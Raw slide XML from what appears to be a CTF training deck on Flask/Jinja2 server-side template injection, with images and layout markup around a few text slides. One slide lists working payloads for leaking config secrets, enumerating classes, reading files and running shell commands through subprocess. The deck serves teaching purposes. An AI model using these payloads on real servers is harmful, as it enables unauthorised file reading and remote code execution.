          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can find the full article here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://nvisium.com/blog/2015/12/07/injecting-flask.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184717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E46B-C13D-D54D-BC72-AA98D7BDBBAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A quick example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>- stolen from the internet ;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C66F05-070C-1C47-9E9D-B3CB27F7CAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1511300"/>
            <a:ext cx="5250156" cy="3400669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD8FD019-E7AD-BB42-9660-5156A90ACAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6242173" y="1511299"/>
            <a:ext cx="4663308" cy="1660525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68994042-5A24-9A49-A678-B7A848FE616A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6242173" y="3525838"/>
            <a:ext cx="4656820" cy="2967037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92EE1013-D335-F445-B810-ED82B521BBE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1761260" y="2341561"/>
            <a:ext cx="1217468" cy="29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576256A-4426-6F48-B2DA-44EC9F4EE755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593273" y="2795299"/>
            <a:ext cx="3087474" cy="319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0642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E46B-C13D-D54D-BC72-AA98D7BDBBAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A quick example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>- stolen from the internet ;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C66F05-070C-1C47-9E9D-B3CB27F7CAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1511300"/>
            <a:ext cx="5250156" cy="3400669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1D0D79-0128-3842-8181-19E2C98B53CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="798220" y="5167312"/>
            <a:ext cx="7665212" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73FADBE-BEDC-3047-8168-1645B9DA367F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7204445" y="1511300"/>
            <a:ext cx="4022329" cy="3217863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4171C30-42D6-3147-B6A9-0C1B3118929D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8581292" y="5346700"/>
            <a:ext cx="3141783" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{person.secret}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and get code execution on the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372B851B-681C-6846-8F6B-6FA32F505BB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257550" y="2371725"/>
            <a:ext cx="2830807" cy="2143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500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E46B-C13D-D54D-BC72-AA98D7BDBBAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A quick example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>- stolen from the internet ;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43C66F05-070C-1C47-9E9D-B3CB27F7CAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838201" y="1511300"/>
            <a:ext cx="5250156" cy="3400669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7842D23-18F0-6E43-9430-6F3989207708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6287353" y="1558538"/>
            <a:ext cx="4867451" cy="1653096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC8B0F73-C92F-6647-B9DA-8799FF9DAF67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6287353" y="3646367"/>
            <a:ext cx="4867451" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>We can even get LFI!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>In other vulnerable applications, the issue can range from simply displaying application variables to full RCE.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2151183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B84F-B5D7-4041-9A56-D7F6478DC763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding flags</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBFB413-EE7E-4E4A-8E6B-009DBBB58233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Introspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>locals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to see everything that’s available in the template context.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{request.application.__self__._get_data_for_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'].JSONEncoder.default.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>current_app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'].config['FLAG’]}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>request.environ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object contains the method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>shutdown_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Extract classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{''.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>class.mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()[1].subclasses()}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Arbitrary file read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config.items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()[4][1].__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__[2].__subclasses__()[40](\"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/flag\").read() }}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the subprocesses class we can issue arbitrary commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config.items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()[4][1].__class__.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>__[2].__subclasses__()[229]([\"touch /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/test\"], shell=True) }}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA1348C-EDCD-304B-B0C6-17E6E205D4FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4618893" y="6308209"/>
            <a:ext cx="7410875" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Samples from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156732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B84F-B5D7-4041-9A56-D7F6478DC763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Finding the flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADBFB413-EE7E-4E4A-8E6B-009DBBB58233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="3089031" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There are quite a few paths to explore with this vulnerability. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Likely in CTF you are looking for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>RCE,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>LFI or information disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C544793F-584C-7F49-BE92-2E3869F2F661}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3927231" y="1825625"/>
            <a:ext cx="7324724" cy="3662362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3205988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B84F-B5D7-4041-9A56-D7F6478DC763}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
